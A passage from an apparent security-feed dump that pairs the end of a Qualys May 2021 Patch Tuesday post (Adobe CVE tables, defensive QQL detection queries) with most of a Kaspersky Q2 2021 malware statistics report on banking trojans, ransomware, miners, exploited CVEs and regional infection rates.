Critical \nCritical \nCritical| CVE-2021-21098 \nCVE-2021-21099 \nCVE-2021-21043 \n[APSB21-24 Security update available for Adobe Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>)| 375551| Critical \nCritical \nCritical \nCritical \nCritical| CVE-2021-21101 \nCVE-2021-21103 \nCVE-2021-21104 \nCVE-2021-21105 \nCVE-2021-21102 \n[APSB21-29 Security update available for Adobe Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)| 375547| Important \nCritical \nImportant \nCritical \nImportant \nCritical \nCritical \nCritical \nCritical \nCritical \nImportant \nCritical \nCritical \nCritical| CVE-2021-28561 \nCVE-2021-28560 \nCVE-2021-28558 \nCVE-2021-28557 \nCVE-2021-28555 \nCVE-2021-28565 \nCVE-2021-28564 \nCVE-2021-21044 \nCVE-2021-21038 \nCVE-2021-21086 \nCVE-2021-28559 \nCVE-2021-28562 \nCVE-2021-28550 \nCVE-2021-28553 \n[APSB21-32 Security update available for Adobe Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>)| 375550| Important| CVE-2021-28569 \n[APSB21-35 Security update available for Adobe Animate7](<https://helpx.adobe.com/security/products/animate/apsb21-35.html>)| 375553| Important \nImportant \nImportant \nImportant \nImportant \nCritical \nCritical| CVE-2021-28572 \nCVE-2021-28573 \nCVE-2021-28574 \nCVE-2021-28575 \nCVE-2021-28576 \nCVE-2021-28578 \nCVE-2021-28577 \n \n### Discover Patch Tuesday Vulnerabilities in VMDR \n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`50111` OR qid:`91762` OR qid:`91763` OR qid:`91764` OR qid:`91766` OR qid:`91767` OR qid:`100415` OR qid:`110380` OR qid:`110381` OR qid:`110382` OR qid:`375547` OR qid:`375549` OR qid:`375550` OR qid:`375551` OR qid:`375553` OR qid:`375556` OR qid:`375557`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`qid:`50111` OR qid:`91762` OR qid:`91763` OR qid:`91764` OR qid:`91766` OR qid:`91767` OR qid:`100415` OR qid:`110380` OR qid:`110381` OR qid:`110382` OR qid:`375547` OR qid:`375549` OR qid:`375550` OR qid:`375551` OR qid:`375553` OR qid:`375556` OR qid:`375557``\n\n\n\n### Patch Tuesday Dashboard \n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Patches_](<https://www.brighttalk.com/webcast/11673/486394>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * 21Nails Exim Mail Server Multiple Vulnerabilities\n * Pulse Connect Secure Remote Code Execution Vulnerability (CVE-2021-22893)\n * Microsoft Patch Tuesday, May 2021\n\n[Join us live or watch on demand](<https://www.brighttalk.com/webcast/11673/486394>)!\n\n### About Patch Tuesday \n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-05-11T21:53:37", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (May 2021) \u2013 Qualys covers 85 Vulnerabilities, 26 Critical", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-24587", "CVE-2020-24588", "CVE-2020-26144", "CVE-2021-1720", "CVE-2021-21038", "CVE-2021-21043", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-21098", "CVE-2021-21099", "CVE-2021-21101", "CVE-2021-21102", "CVE-2021-21103", "CVE-2021-21104", "CVE-2021-21105", "CVE-2021-22893", "CVE-2021-26418", "CVE-2021-26419", "CVE-2021-26421", "CVE-2021-26422", "CVE-2021-27068", "CVE-2021-28455", "CVE-2021-28465", "CVE-2021-28474", "CVE-2021-28476", "CVE-2021-28478", "CVE-2021-28479", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565", "CVE-2021-28569", "CVE-2021-28572", "CVE-2021-28573", "CVE-2021-28574", "CVE-2021-28575", "CVE-2021-28576", "CVE-2021-28577", "CVE-2021-28578", "CVE-2021-31165", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31168", "CVE-2021-31169", "CVE-2021-31170", "CVE-2021-31171", "CVE-2021-31172", "CVE-2021-31173", "CVE-2021-31174", "CVE-2021-31175", "CVE-2021-31176", "CVE-2021-31177", "CVE-2021-31178", "CVE-2021-31179", "CVE-2021-31180", "CVE-2021-31181", "CVE-2021-31184", "CVE-2021-31185", "CVE-2021-31186", "CVE-2021-31187", "CVE-2021-31188", "CVE-2021-31190", "CVE-2021-31191", "CVE-2021-31192", "CVE-2021-31193", "CVE-2021-31194", "CVE-2021-31195", "CVE-2021-31198", "CVE-2021-31200", "CVE-2021-31204", "CVE-2021-31205", "CVE-2021-31207", "CVE-2021-31208", "CVE-2021-31209", "CVE-2021-31211", "CVE-2021-31213", "CVE-2021-31214"], "modified": "2021-05-11T21:53:37", "id": "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-08-12T10:37:29", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide&#x27;s creators heaped the blame on third-party operators. Another post was published stating that DarkSide&#x27;s developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals&#x27; infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group&#x27;s activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. There appeared the new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family, which packs user files into a password-protected 7zip archive, plus our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 